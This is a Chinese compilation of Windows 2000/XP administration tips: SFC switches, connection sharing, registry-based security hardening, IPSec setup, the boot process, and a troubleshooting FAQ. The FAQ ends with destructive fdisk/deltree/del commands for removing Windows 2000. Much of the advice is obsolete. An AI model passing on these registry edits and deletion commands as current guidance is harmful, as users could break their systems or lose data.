其中以加粗标注的参数要小心使用

/SCANNOW　立即扫描所有受保护的系统文件
/SCANONCE 扫描所有受保护的系统文件一次
/SCANBOOT 每次启动时扫描所有受保护的系统文件
/CANCEL 取消所有暂停的受保护系统文件的扫描
/ENABLE 为正常操作启用 Windows 文件保护
/PURGECACHE　清除文件缓存并立即扫描所有受保护的系统文件（只有在确定系统没有问题残能使用，因为一旦使用以后系统的缓存会全部丢失，要恢复系统文件就比较麻烦了）
/CACHESIZE=x 单位：MB 设置文件缓存大小（请根据硬盘空间大小安排）
/QUIET 不提示用户就替换所有不正确的文件版本（千万要慎重考虑是否使用这个参数，因为使用不正确的系统文件非常容易导致系统瘫痪）


WIN2000 实现网络共享连接

《一键清理系统垃圾》

WIN2000 实现网络共享连接

在微软以前版本的视窗操作系统中，我们实现共享连接一般使用WinGate、SyGate等代理服务器软件。Windows 2000给我们提供了Internet网络共享功能，此项功能更好用，设置也更方便，很适合小型办公和家庭网络的使用。

在Windows 2000中设置网络共享很简单，过程如下：

服务器端设置

1.在服务器端，通过Internet连接服务建立Internet连接。

2.进入“控制面板”，运行“网络和拨号连接”。

3.在“网络和拨号连接”中，右键单击1中建立的Internet连接，选择“属性”。

4.在“属性”设置面板中选“共享”页，选择“启用此连接的Internet连接共享”。

如果需要网络中的其它计算机可以在设置网络共享的计算机没有上网的情况下要求它拨号，可以选择“启用请求拨号”,然后在弹出的画面中点“是”,至此服务器方设置完毕。

客户端设置

1.在客户端，将同网卡绑定的 TCP/IP 设置为自动获取 IP 地址。

2.在浏览器的Internet连接设置中，选择“从不进行拨号连接”，然后选择“局域网设置”，在“自动配置”中，清除“自动检测设置”和“使用自动配置脚本”复选框，在“代理服务器”中，清除“使用代理服务器”复选框，客户端配置完毕。

可以看出它的设置过程还是很简单的，在我们选择了Windows 2000的Internet共享连接后，服务器所发生的变化对用户来说几乎完全透明，其主要变化是网卡绑定的TCP/IP的IP地址改为192.168.0.1，子网掩码为255.255.255.0，另外DHCP分配者和DNS代理都将自动启用。

需要特别注意的是不应该将此功能与域控制器、DNS服务器、网关、DHCP 服务器，或配置为静态 IP 地址的系统一起使用，如需要使用这样的组件，则必须使用网络地址转换来得到同样的结果。

返回


win2000server安全设置的一些小技巧[推荐]

《一键清理系统垃圾》

win2000server安全设置的一些小技巧[推荐]

1.如何关闭Windows 2000下的445端口？
修改注册表，添加一个键值

Hive: HKEY_LOCAL_MACHINE

Key: System\Controlset\Services\NetBT\Parameters

Name: SMBDeviceEnabled

Type: REG_DWORD

value: 0

修改完后重启机器，运行“netstat -an”，你将会发现你的445端口已经不再Listening了。

2.如何使用IPSec保护我的网络通信？
IPSec 术语
在执行以下指导步骤之前，确保您知道以下术语的含义：
身份验证：确定计算机的身份是否合法的过程。Windows 2000 IPSec 支持三种身份验证：Kerberos、证书和预共享密钥。只有当两个终结点（计算机）都位于同一个 Windows 2000 域时，Kerberos 身份验证才有效。这种类型的身份验证是首选方法。如果计算机位于不同的域中，或者至少有一台计算机不在某个域中，则必须使用证书或预共享密钥。只有当每个终结点中包含一个由另一个终结点信任的颁发机构签署的证书时，证书才有效。预共享密钥与密码有着相同的问题。它们不会在很长的时间段内保持机密性。如果终结点不在同一个域中，并且无法获得证书，则预共享密钥是唯一的身份验证选择。

加密：使准备在两个终结点之间传输的数据难以辨认的过程。通过使用充分测试的算法，每个终结点都创建和交换密钥。该过程确保只有这些终结点知道密钥，而且如果任何密钥交换序列被拦截，拦截者不会得到任何有价值的内容。

筛选器：对 Internet 协议 (IP) 地址和协议的描述，可触发 IPSec 安全关联的建立。

筛选器操作：安全要求，可在通信与筛选器列表中的筛选器相匹配时启用。

筛选器列表：筛选器的集合。

Internet 协议安全策略：规则集合，描述计算机之间的通讯是如何得到保护的。

规则：筛选器列表和筛选器操作之间的链接。当通信与筛选器列表匹配时，可触发相应的筛选器操作。IPSec 策略可包含多个规则。

安全关联：终结点为建立安全会话而协商的身份验证与加密方法的集合。

在 Microsoft 管理控制台中查找 IPSec
通过使用 Microsoft 管理控制台 (MMC) 配置 IPSec。Windows 2000 在安装过程中创建一个带有 IPSec 管理单元的 MMC。若要查找 IPSec，请单击开始，指向程序，单击管理工具，然后单击本地安全策略。在打开的 MMC 中的左窗格中，单击本地计算机上的 IP 安全策略。MMC 将在右窗格中显示现有的默认策略。

更改 IP 地址、计算机名和用户名
为了此示例的目的，假设 Alice 是一个计算机用户，该计算机名为"Alicepc"、IP 地址为 172.16.98.231，Bob 的计算机名为"Bobslap"，IP 地址为 172.31.67.244。他们使用 Abczz 程序连接他们的计算机。

通过使用 Abczz 程序互相连接时，Alice 和 Bob 必须确保通信是被加密的。当 Abczz 建立其连接时，启动程序使用其本身上的随机高端口并连接（出于本示例中的目的）到 6667/TCP 或 6668/TCP 端口上的目标（其中，TCP 是"传输控制协议"的缩写）。通常，这些端口用作 Internet 多线交谈 (IRC)。因为 Alice 或 Bob 均可发起连接，所以该策略必须存在于两端。

创建筛选器列表
通过在 MMC 控制台中右键单击 IP 安全策略，可访问用于创建 IPSec 策略的菜单。第一个菜单项是"创建 IP 安全策略"。尽管此菜单似乎是要开始的位置，但却不应从此位置开始。在可创建策略及其相关规则之前，您需要定义筛选器列表和筛选器操作，它们是任何 IPSec 策略的必需组件。单击管理 IP 筛选器表和筛选器操作开始工作。

将显示带有两个选项卡的对话框：一个用于筛选器列表，另一个用于筛选器操作。首先，打开管理 IP 筛选器列表选项卡。已经有两个预先定义的筛选器列表，您不会使用它们。相反，您可以创建一个特定的筛选器列表，使其与要连接到的其他计算机对应。

假设您在 Alice 的计算机上创建策略：
单击添加创建新的筛选器列表。将该列表命名为"Abczz to Bob's PC"。

单击添加添加新筛选器。将启动一个向导。

单击我的 IP 地址作为源地址。

单击一个特定的 IP 地址作为目标地址，然后输入 Bob 的计算机的 IP 地址 (172.31.67.244)。或者，如果 Bob 的计算机已在域名系统 (DNS) 或 Windows Internet 名称服务 (WINS) 中注册，则可选择特定的 DNS 名，然后输入 Bob 的计算机名，Bobslap。

Abczz 使用 TCP 进行通讯，因此单击 TCP 作为协议类型。

对于 IP 协议端口，单击从任意端口。单击到此端口，键入：6667，然后单击完成完成该向导。

重复上述步骤，但这次键入：6668作为端口号，然后单击关闭。

您的筛选器列表中包含两个筛选器：一个在端口 6667 （属于 Bob）上用于从 Alice 到 Bob 的通讯，另一个在端口 6668 （属于 Bob）上。（Bob 在自己的计算机上设置了 6667 和 6668 两个端口：一个端口用于传出的通讯，另一个用于传入的通讯。）这些筛选器是镜像的，每次创建 IPSec 筛选器时通常都需要如此。对于已镜像的每个筛选器，该列表可包含（但不显示）与其正好相反的筛选器（即目标和源地址与其相反的筛选器）。如果没有镜像筛选器，IPSec 通讯通常不成功。

创建筛选器操作
您已经定义了必须受到保护的通信的种类。现在，您必须指定安全机制。单击管理筛选器操作选项卡。列出三个默认操作。不要使用要求安全操作，您必须创建一个更严格的新操作。

若要创建新操作，请：
单击添加创建新筛选器操作。启动一个向导。将该操作命名为"Encrypt Abczz"。

对于常规选项，单击协商安全，然后单击不和不支持 IPsec 的计算机通讯。

单击 IP 通信安全性为高选项，然后单击完成以关闭该向导。

双击新的筛选器操作（前面命名的"Encrypt Abczz"）。

单击清除接受不安全的通讯，但总是用 IPSec 响应复选框。这一步骤确保计算机在发送 Abczz 数据包之前必须协商 IPSec。

单击会话密钥完全向前保密以确保不重新使用密钥资料，单击确定，然后单击关闭。

创建 IPSec 策略
您已经获得了策略元素。现在，您可以创建策略本身了。右键单击 MMC 的右窗格，然后单击创建 IP 安全策略。当向导启动时：
将该策略命名为"Alice's IPSec"。

单击清除激活默认响应规则复选框。

单击编辑属性（如果未选中的话），然后完成该向导。该策略的属性对话框将打开。

为使 IPSec 策略有效，它必须至少包含一个将筛选器列表链接到筛选器操作的规则。

若要在属性对话框中指定规则，请：
单击添加以创建新规则。启动向导后，单击此规则不指定隧道。

单击局域网 (LAN) 作为网络类型。

如果 Alice 和 Bob 的计算机位于同一个 Windows 2000 域中，单击 Windows 2000 默认值（Kerberos V5 协议）作为身份验证方法。如果不在一个域中，则单击使用此字串来保护密钥交换(预共享密钥)，然后输入字符串（使用您可记住的长字符串，不要有任何键入错误）。

选择前面创建的筛选器列表。在此示例中，该筛选器列表为"Abczz to Bob's PC"。然后，选择前面创建的筛选器操作。在此示例中，该筛选器操作为"Encrypt Abczz"。

完成该向导，然后单击关闭。

配置其他终结点
在 Bob 的计算机上重复上述应用于 Alice 的计算机的所有步骤。显然要进行一些必要的更改，例如，"Abczz to Bob's PC"必须更改为"Abczz to Alice's PC"。

指派策略
您已经在两个端点上定义了策略。现在，必须指派它们：
在本地安全设置 MMC 中，右键单击策略（在此示例中为 Abczz ）。

单击指派。

一次只能指派一个 IPSec 策略，但是一个策略可根据需要拥有多个规则。例如，如果 Alice 还需要通过使用不同的协议保护与 Eve 的通讯，则您必须创建相应的筛选器列表和操作，并向 IPSec （属于 Alice）添加一个规则，以便将特定的筛选器列表和筛选器操作链接起来。单击为此规则使用不同的共享密钥。Alice 的策略现在有两个规则：一个用于与 Bob 进行 Abczz 通讯，另一个用于与 Eve 进行通讯。因为 Bob 和 Eve 无需安全地互相通讯，所以 Bob 的策略中未添加任何规则，Eve 的策略中包含一个用于与 Alice 进行通讯的规则。

疑难解答
使用 IPSecMon 测试策略
Windows 2000 包括一个实用程序 (IPSecMon.exe)，它可用于测试 IPSec 安全关联是否已成功建立。若要启动 IPSecMon，请：
单击开始，然后单击运行。

键入：ipsecmon，然后按 ENTER 键。

单击选项。

将刷新间隔更改为 1。

必须在不同终结点之间建立通讯。可能会有一个延迟，这是由于终结点需要几秒钟时间来交换加密信息并完成安全关联。可在 IPSecMon 中观察此行为。当这两个终结点都建立了它们的安全关联，可在 IPSecMon 中观察到显示此行为的条目。

如果期望的安全协商没有建立，则返回并检查每个终结点上的筛选器列表。在您方便地将源地址和目标地址或端口反向时，确保已经收到所使用协议的正确定义。您可能要考虑创建一个指定所有通信的新筛选器列表。同样，可向使用此筛选器列表的策略添加一个新规则，然后禁用现有的规则。在两个终结点上执行这些步骤。然后，可使用 ping 命令测试连接性。ping 命令在安全关联阶段可显示"Negotiating IP security"（正在协商 IP 安全），然后显示建立安全关联之后的正常结果。

NAT 与 IPSec 不兼容
如果在两个终结点之间有任何网络地址转换 (NAT)，则 IPSec 不起作用。IPSec 将终结点地址作为有效负载的一部分嵌入。在将数据包发送到电缆上之前进行数据包校验和计算时，IPSec 也使用源地址。NAT 可更改出站数据包的源地址，目标在计算自己的校验和时使用头中的地址。如果数据包中携带的用初始来源计算的校验和与用目标计算的校验和不符，则目标可丢弃这些数据包。不能将 IPSec 用于任何类型的 NAT 设备。

参考
有关 Windows 2000 中 IPSec 的白皮书和详细的技术信息，请参阅以下 Microsoft Web 站点：
http://www.microsoft.com/windows2000/technologies/security/default.asp

3.如何更改Terminal Server的端口
该修改需要在服务器端和客户端同时修改，如果不知道该服务器的端口号，客户端将无法连接服务器。

服务器端的修改：

Key: HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp

Name: PortNumber

Type: DWORD

Valus:任意值

Key: HKLME\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

Name: PortNumber

Type: DWORD

value:和上面值一致

注：需重启后生效。

然后我们修改客户端，打开Terminal Server Client的客户端管理器，导出连接文件（后缀名为cns），用记事本打开该cns文件，搜索"Server Port"，修改该值，与服务器保持一致即可（注意进制的转换）。最后导入该cns文件至Terminal Server的客户端管理器。

4.如何禁止Guest访问事件日志？
在默认安装的Windows NT和Windows 2000中，Guest帐号和匿名用户可以查看系统的事件日志，可能导致许多重要信息的泄漏，建议修改注册表来禁止Guest访问事件日志。

应用日志：

Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application

Name: RestrictGuestAccess

Type: DWORD

value: 1

系统日志：

Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System

Name: RestrictGuestAccess

Type: DWORD

value: 1

安全日志：

Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Security

Name: RestrictGuestAccess

Type: DWORD

value: 1

5.如何删除管理共享(C$,D$...)？
我们可以用Net Share命令来删除，但是机器重启后这个共享会自动出现，这时，我们可以修改注册表。

对于服务器而言：

Key: HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters

Name: AutoShareServer

Type: DWORD

value: 0

对于工作站而言：

Key: HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters

Name: AutoShareWks

Type: DWORD

value: 0

修改注册表后需要重启Server服务或重新启动机器。

注：这些键值在默认情况下在主机上是不存在的，需要自己手动添加。

6.如何禁止恶意用户使用FileSystemObject？
常见的有3种方法：

1、修改注册表，将FileSystemObject改成一个任意的名字，只有知道该名字的用户才可以创建该对象，

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID]
@="Scripting.FileSystemObject"

2、运行Regsvr32 scrrun.dll /u，所有用户无法创建FileSystemObject。

3、运行cacls %systemroot%\system32\scrrun.dll /d guests，匿名用户（包括IUSR_Machinename用户）无法使用FileSystemObject，我们可以对ASP文件或者脚本文件设置NTFS权限，通过验证的非Guests组用户可以使用FileSystemObject。

7.如何禁止显示上次登陆的用户名？
我们可以通过修改注册表来实现：

Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon

Name: DontDisplayLastUserName

Type: REG_DWORD

value: 1

8.如何禁止匿名用户连接你的IPC$共享？
我们可以通过修改注册表来实现

Key:HKLM\SYSTEM\CurrentControlSet\Control\Lsa

Name: RestrictAnonymous

Type: REG_DWORD

value: 1 | 2

说明：把该值设为1时，匿名用户无法列举主机用户列表；

把该值设为2时，匿名用户无法连接你的IPS$共享，不建议使用2，否则可能会造成你的一些服务无法启动，如SQL Server...


Windows2000/XP启动过程详解

《一键清理系统垃圾》

Windows2000/XP启动过程详解

Windows2000/XP是一个优秀的操作系统,它功能强大,安全稳定,深受广大电脑用户青睐。但在使用过程中,我们明显地感觉到它的启动时间比Windows98要延长许多,比之Windows98更能考验人的耐性。那么在这段让人忍无可忍但又不可不忍的时间中,系统究竟做了些什么工作哪,别急，，容俺慢慢道来，咱看一看它究竟为何如此龟速。
     在基于INTEL的计算机上,Windows2000/XP的启动过程大致可分为5个步骤:预启动,启动,装载内核,初始化内核以及用户登录。下面分别展开介绍：
     一.预启动
     首先计算机通电进行自检,并由BIOS(即基本输入输出系统)完成基本硬件配置,然后读取硬盘的MBR(主引导记录)检查硬盘分区表以确定引导分区,并将引导分区上的操作系统引导扇区调入内存中执行,此处即执行NTLDR(操作系统加载器)文件。
          * Windows2000/XP支持多重启动。它在安装时会首先将已存在的其它操作系统引导扇区保存为BOOTSECT.DOS文件(位于活动分区根目录下),并修改系统引导扇区,以便系统启动时加载NTLDR文件,从而达到多重启动的目的。而Windows98则不具备这个功能，因此如果先装好Windows2000/XP后再装Windows98会破坏掉Windows2000/XP的引导记录，导致2000/XP不能启动。
     二.启动
          1.首先进行出始化,NTLDR会把处理器从实模式转换为32位保护模式。
          2.读取BOOT.INI文件。该文件位于活动分区根目录下,它的作用是使系统在启动过程中出现选择菜单,由用户选择希望启动的操作系统。如果选择启动Windows2000/XP,NTLDR会继续引导进行以下过程;如果选择为非Windows2000/XP系统,NTLDR则会读取系统引导扇区副本BOTSECT.DOS转入启动相应系统。
          * 其中[BOOT LOADER]即操作系统加载器,指定系统选择菜单默认等待时间和默认引导的操作系统。可手工修改或在控制面板中修改，为了保险起见，建议在控制面板中修改。依次选择控制面板-〉系统-〉高级->启动和故障恢复，即可更改相关设置。(在WindowsXP中还有另一种方法，即运行msconfig（系统配置实用程序）。
            [OPERATING SYSTEMS]段指定操作系统列表,由双引号括起来的部分就是列表所显示的内容,可任意修改,使其更加个性化。
          * 形如MULTI(0)DISK(0)RDISK(0)PARTITION(1)格式的语句被称为ARC路径,它的格式为:MULTI()——指定磁盘控制器(若为SCSI控制器,则此处应替换为SCSI())；DISK()——指定SCSI设备编号(对于MULTI该处值始终为0)；RDISK()——指定IDE设备编号(对于SCSI,此处被忽略)；PARTITION()——指定分区编号。除分区编号由1开始外,其余编号均从0开始。
            参数/FASTDETECT表示禁用串行鼠标检测,是系统默认值。还有几个常见参数:MAXMEM——指定Windows2000/XP可用内存容量;BASEVIDEO——使用标准VGA显示驱动程序;NOGUIBOOT——启动过程中不显示图形屏幕;SOS——加载设备驱动程序时显示其名称。
          * 在操作系统选择菜单中的中文字体由位于活动分区根目录下的BOOTFONT.BIN文件提供。
          3.系统加载NTDETECT.COM文件。由它来检测机器硬件,如并行端口,显示适配器等等,并将收集到的硬件列表返回NTLDR用于以后在注册表中注册保存。
          4.如果Windows2000/XP有多个硬件配置文件,此时会出现选择菜单,等待用户确定要使用的硬件配置文件,否则直接跳过此步,启用默认配置。
          * 硬件配置文件是指保存计算机特定硬件配置的系统文件。可以创建多个不同的硬件配置文件以满足计算机在不同场合的应用。可以依次选择控制面板-〉系统->硬件-〉硬件配置文件作出修改。
     三.装载内核
          引导过程开始装载Windows2000/XP内核NTOSKRNL.EXE。这个文件位于Windows2000/XP安装文件夹下的SYSTEM32文件夹中。随后,硬件抽象层(HAL)被引导进程加载,完成本步骤。
          * 硬件抽象层(HAL):隐藏特定平台的硬件接口细节,为操作系统提供虚拟硬件平台,使其具有硬件无关性,可在多种平台上进行移植。
     四.初始化内核
          内核完成初始化,NTLDR将控制权转交Windows2000/XP内核,后者开始装载并初始化设备驱动程序,以及启动WIN32子系统和WINDOWS2000/XP服务。
     五.用户登录
          开始登录进程。由WIN32子系统启动WINLOGON.EXE,并由它启动LOCAL SECURITY AUTHORITY(LSASS.EXE)显示登录对话框。用户登录后,WINDOWS2000/XP会继续配置网络设备和用户环境。最后,伴随着微软之声和我们熟悉的个性化桌面,WINDOWS2000/XP漫长的启动过程终于完成。呵，是不是睡着了，醒醒吧，系统启动成功，您现在该干嘛就干嘛！


Win2000常见问题解决方案

《一键清理系统垃圾》

Win2000常见问题解决方案

    Win2000这个微软新推出的操作系统，很快以其强大的功能和稳定性征服了广大用户。然而，我们在使用Win2000的过程中，还是无可避免地会碰到各种各样的问题，而且由于Win2000和Win98有很大的不同，以往解决Win98问题的方法，不一定能解决Win2000的问题。近来询问Win2000问题的朋友越来越多，为了方便大家，我整理了一些在使用Win2000中常见问题的解决方案，希望对大家有所启发。
    1.我的Win2000为何无法像Win98一样直接软关机？
    这个问题主要是你的主板对ACPI支持不好所造成的。你可以采用以下方法来解决。
    (1)去网上看看有没有主板的最新BIOS，升级BIOS是解决该问题的首选方案。
    (2)如果没有新的BIOS，可以手动修改注册表:打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Winlogon在Winlogon项上单击右键，选择“新建”→“字串值”，输入 “PowerdownAfterShutdown”，再双击“PowerdownAfterShutdown”，编辑数值为1。
    (3)如果还不行，你可以在安装Win2000以后，打开“控制面板”→“电源选项”→“休眠”→“启用休眠支持”（如图1），在“高级能源管理”上选中启用“高级能源管理”就可以软关机了。
    (4)如果上述方法都未能奏效，就该查看BIOS信息了，也许你的BIOS中没有打开高级能源管理呢！
    2.当我启用了高级电源管理之后，关闭计算机就变成重新启动了，怎么回事？
    请升级你的BIOS，而且请把Win2000电源管理中的APM去掉，因为它是为兼容一些老式笔记本而设的，用于台式机则会导致异常，比如:关机变成重启。下面是一位网友的实例。在升级了BIOS之后（主板型号是ASUS P2B），进入Win2000电源管理并没有什么变化（注意变化是发生在电源管理的“高级”选项页）。重新安装了Win2000后，才出现了“在按下电源按钮时”的选项菜单（如图2，不过相信你现在没有看到这一项）。而且令人吃惊的是:在没有升级BIOS并重装系统之前，在电源管理中有启用APM的选项，在完成升级之后，这个选项就消失了。其实，到目前为止要做的事情很简单:在升级BIOS之后，要么重新安装系统，要么使用设备管理器进行硬件改动扫描。如果还不行的话，就只好等待新版本的BIOS了。
    3.为什么我在Win9x下安装Win2000显示“无法检测当前操作系统版本号”而退出了安装？
    主要原因是Win2000安装程序没有检测到当前的Windows版本，如果用Win98的测试版就会出现这种情况，有些安装时不需要输入序列号的盗版Win98也能造成此类事件。你只需手动修改Win9x的注册表，添加序列号就可以了，该键值在HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion下。新建一个“字串值”ProductKey，将它的值设置为你的Win98的序列号，同时建一个VersionNumber字串值，值赋为你的Win98的版本号（我这里是“4.10.1998”，如图3）。但是上述方法比较麻烦，建议利用Win2000的光盘启动安装，或在DOS方式下安装，这样比较省事。
    4.怎样才能卸载Win2000中无用的组件呢？
    用记事本或者其它编辑器修改\Winnt\inf\sysoc.inf（我用的是EmEditor），用“查找/替换”功能，在查找框中输入“，hide”（一个英文逗号紧跟hide），将“替换为”框设为空，并选全部替换（如图4）。这样，就把所有的“，hide”都去掉了。存盘退出后再进入“控制面板”→“添加/删除程序”→“添加/删除Windows组件”，就会看见多出了“附件和工具”项。
    5.我的机器是Win2000和Win98双启动，我该如何更改它们的启动顺序？
    有两种方法:
    (1)编辑C盘根目录下的Boot.ini，此时文件内容是:
    [Boot Loader]
timeout=30
    default=C:
    [operating systems]
    multi(0)disk(0)rdisk(0)partition(1)WINNT="Win2000 简体中文专业版" /fastdetect
C:="Windows 千禧版"
    将default后面的C:换成你想要启动的操作系统即可（在本例中我们假设要启动“Windows 千禧版”）;如果你要启动“Windows 2000简体中文版”也没有问题，将default后边的c:改成“multi(0)disk(0)rdisk(0)partition(1)WINNT”（不包括引号）即可。
(　　2)下边是一种比较简单的方式:进入Win2000,点击“开始”→“设置”→“控制面板”。打开后，双击“系统”图标，选择其中的“高级”项，单击“启动和恢复故障”按钮，就可以更改“默认操作系统”了（如图5）。
    6.紧急修复盘和启动盘有什么区别？
    紧急修复盘是在Win2000的备份程序中创建的（“开始”→“程序”→“附件”→“系统工具”→“备份程序”），它本身没有任何启动计算机的功能，只在修复Win2000故障时使用。而启动盘是利用Bootdisk创建的（就是Win2000的安装光盘下的MakeBoot.exe或者MakeBT32.exe，其中在Win9x中创建启动盘用前者，WinNT下用后者），它的容量很大（其实也不是很大，只不过需要四张软盘）。作用嘛？就是可以利用软盘启动、修复（要和前边制作的紧急修复盘结合使用）操作系统。
    7.为什么告知应用程序出错将被关闭后会有剧烈的读盘现象，并且要过很久程序才能关闭？
    这都是Win2000的错误记录惹的祸。在“开始”菜单的“运行”选项中输入drwtsn32，运行后会出现一个对话框，将其中除了“视觉通知”以外的项目全部去掉（如图6）。这样下次程序崩溃时对话框也会出现，但不会再有剧烈的读盘，出错程序将很快被关闭。
    8.我原来在Win98下安装过Office 2000，现在又装了Win2000，我该怎样才能在Win2000下使用Office 2000？
    你必须重新执行安装程序，在安装时将路径指到Win98安装的Office 2000文件夹，这样并不会多占你任何磁盘空间的。不光是Office 2000，只要是注明For Win9x/NT/2000的应用程序都可以这样做。
    9.Win2000的内存页面（虚拟内存）应该如何配置？
    Win2000有两个文件占用了大量硬盘空间，它们是内存交换文件PageFile.sys和活动目录信息存储文件NTDS.DIT。系统安装的时候，自动把内存交换文件设为比物理内存大50%，这对于负载很重的服务器以及图形工作站显然是不够的，以下的方法可以有效地减轻内存的负载:
    (1)把内存交换页面分散到不同的磁盘上。你可以把内存交换页面从Win2000分区上移到别的磁盘上，最多可以有16个内存交换页面，只要它们每一个位于不同的逻辑驱动器上，并且只有位于不同的磁盘上才能提升系统的整体性能。但是，如果把内存交换页面移出系统分区后，当发生内核错误（如蓝屏）时，系统将不能把内存中的数据写入磁盘。
    (2)避免内存交换页面出现碎片。内存交换页面也会出现碎片，并且会在以下两个方面严重影响系统的性能。第一，在出现碎片的内存交换页面中寻找所需页面需要更长的时间；第二，内存交换页面是被锁定的，因此，系统碎片整理程序必须绕开它进行碎片整理。避免内存交换页面出现碎片的最有效的方法是分一个区（或者用单独一个磁盘，这样还会大大提高整机性能）专门用来存放页面，并且还可以对该区设定NTFS权限，阻止用户看到该区，减少用户对内存交换页面做非法操作的可能性。
    (3)改变内存交换页面的设置。
    右击“我的电脑”，在弹出的菜单上选择“属性”项。
    在弹出的属性页中选择“高级”项，然后再选择“性能”。
    在“虚拟内存”中，单击“改变”，就会出现虚拟内存的修改页面了（如图7）。
    如果你想改变现有的内存交换页面的大小，就改变虚拟内存的最大和最小值；如果你想在第二个磁盘上建立虚拟内存，就选择该驱动器，然后填入大小值。
    10.在Win2000中虚拟内存的最佳数值是多少？
如果你的内存小于96MB，将其设置为内存的1.5倍比较合适（当然2倍也未尝不可）。如果你的内存为96～256MB，那么微软的建议是内存+30MB是最为适宜的选择，不过如果你经常需要进行大量多任务操作，最好还是设置为内存的1.5倍。如果你有256MB内存，那么将页面文件设置为256MB吧！
    11.我的Win2000为什么无法玩一些游戏？它们的广告上明明指出该种游戏是支持Win2000的。
    既然说明书上指出了，那么Win2000肯定支持你所说的游戏，但是为什么你不行呢？这是因为，市面上的盗版盘大部分都对程序进行了破解和修改，而这些破解是针对Win9x用户的，Win2000往往会出于安全的考虑，限制了其中的一些命令，所以造成了程序出错的提示。如果要在Win2000下玩这些游戏，请买正版吧！还有种情况，是因为Win2000对游戏设施支持不佳，请升级Win2000到SP1（就是Service Pack的第一个版本，它修改了Win2000的一些Bug，可以到http://www.microsoft.com/windows2000/downloads/recommended/sp1/default.asp下载），并且升级你的显卡、声卡驱动程序！这些对你可能会有所帮助。
    12.直接运行系统文件检查器(SFC)不管用了。我该怎么办？
    使用SFC命令要加参数的，其参数有:
    /SCANNOW 立即开始扫描所有受保护的系统文件
    /SCANONCE 扫描所有受保护的系统文件一次。
    /SCANBOOT 每次启动时扫描所有受保护的系统文件。
    /CANCEL 取消所有暂停的受保护系统文件的扫描 。
    /QUIET 不提示用户就替换所有不正确的文件版本。
    /ENABLE 为正常操作启用Windows文件保护。
    /PURGECACHE 清除文件缓存并立即扫描所有受保护的 系统文件。
    /CACHESIZE=x 设置文件缓存大小。
    13.为什么我总是不能成功安装Win2000，难道是我的ATA 66卡在作怪？
    如果是中文版Win2000，安装驱动时会黑屏一段时间（约有几分钟），然后正常继续。如果不能继续，建议在DMA 33模式下装好Win2000，再安装ATA 66驱动程序。如果可以工作正常，再将硬盘接到卡上使用。
    14.我的DMA 66模式为何打不开？
    首先安装一下主板的IDE驱动（For Win2000），如果仍不成功的话请在注册表中找到:HAKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control\Class\{4D36E96A-E325-11CE-BFC1-08002BE10318}，然后选择新增一个DWORD值——EnableUDMA66（如图8），并且将其值设置为1（1表示打开支持，而0则是关闭支持）。当然许多朋友都知道打开这个支持的好处在于它能够极大地提高硬盘的性能，使得文件的传输速度更快。
    15.我的机子在安装Win2000 Server版的时候老是说我的内存低于64MB，可我的内存是64MB呀！
    这个原因有可能是你的主板集成了显卡，调用了一部分内存作为显存（可用内存当然就不够64MB了）。利用下述方法可以解决:将Win2000的I386安装目录复制到本地/网络驱动器上。编辑文件I386根目录下的TXTSETUP.SIF文件。搜索“RequiredMemory”，编辑此行，可以让你随意更改最低内存的多少，但是改动之前你一定要充分认识到你所做的一切后再作更改！默认值是RequiredMemory=66584576（就是64MB），你可以将它改得小一些，以后就可以照常进行安装（这种方法不适用于用winnt32.exe安装，而只适用于用winnt.exe安装），但是你用64MB的内存运行Server版也实在太吃力了一些（运行Win98还差不多）。
    16.我的机器原来只装有Win2000现在我又想玩游戏了，怎样安装Win98而不破坏Win2000呢？
    直接用Win98启动盘启动计算机，再安装Win98到硬盘上（不要与Win2000在一个盘上）。由于Win98对于WinNT/2000系列的多重启动已经支持得很好，你现在可以直接用Win98和Win2000双启动了。注意:虽然Win98已经可以识别这种多重引导系统，但是你最好还是防范一下——在Win2000下格式化一张软盘，然后将C:\下的Boot.ini、Ntdetect.com、ntldr和BootFont.bin拷贝到该张软盘上，这样即使出了意外，你也可以用软盘启动Win2000，修复启动环境和引导扇区后即可拥有Win2000和Win98双启动！
    17.为什么我的Win2000无法禁止光盘的自动运行？在光盘属性里面没有“自动插入通告”了！
    这个问题很简单:运行gpedit.msc，就可以在“管理模板”→“系统”中设置是否自动播放CD（如图9），在其中你还可以找到更多的功能设置！会不会感到眼前一亮呢？
    18.为什么我在Win98下用得好好的内猫在Win2000下无法正常使用呢？有时勉强安装成功了，声卡却不行了，一个劲地响个不停；有时候甚至连关机都不行。
    这个问题肯定是驱动程序安装不正常造成的！有一些内猫驱动的安装步骤和Win98下的并不一样，请一定按照说明书或者驱动程序的Readme来安装！而声卡的问题可以这样解决:进入“控制面板”→“声音和多媒体”→“音频”来更改声音播放的首选设备（不要选中“只使用首选设备”），然后重新启动计算机。
     19.我实在是不喜欢Win2000，它对我这个游戏迷来说一无是处，请问我该怎样将它删掉呢？
    这是最不想回答的问题了……如果你心意已决，请看:
    最简单的方法就是直接格式化硬盘了（即快又省事），但是如果该分区中还有重要的文件就得按照以下步骤操作了。
    用Win98的启动盘引导计算机然后运行以下命令:
    A: >fdisk/mbr （重写引导扇区）
    A: >sys c: （传输Win98的启动文件）
    A: >smartdrv 建立磁盘高速缓存，对下一步有帮助，如果你的启动盘里没有Smartdrv，请在Win98的目录中找到该文件运行即可（在\Windows\command里面）；
    A: >deltree x:\WINNT （删除Win2000 的主文件夹）；
    A: >deltree x:\Progra~1 （删除Programs Files目录）；
    A: >del C:\Boot*.* （删掉Win2000的一些启动配置文件:boot.ini, bootsect.DOS）；
    A: >del C:\nt*.* （删掉Win2000另外的的一些相关启动文件:ntldr, ntdetect.com和ntbootdd.sys）；
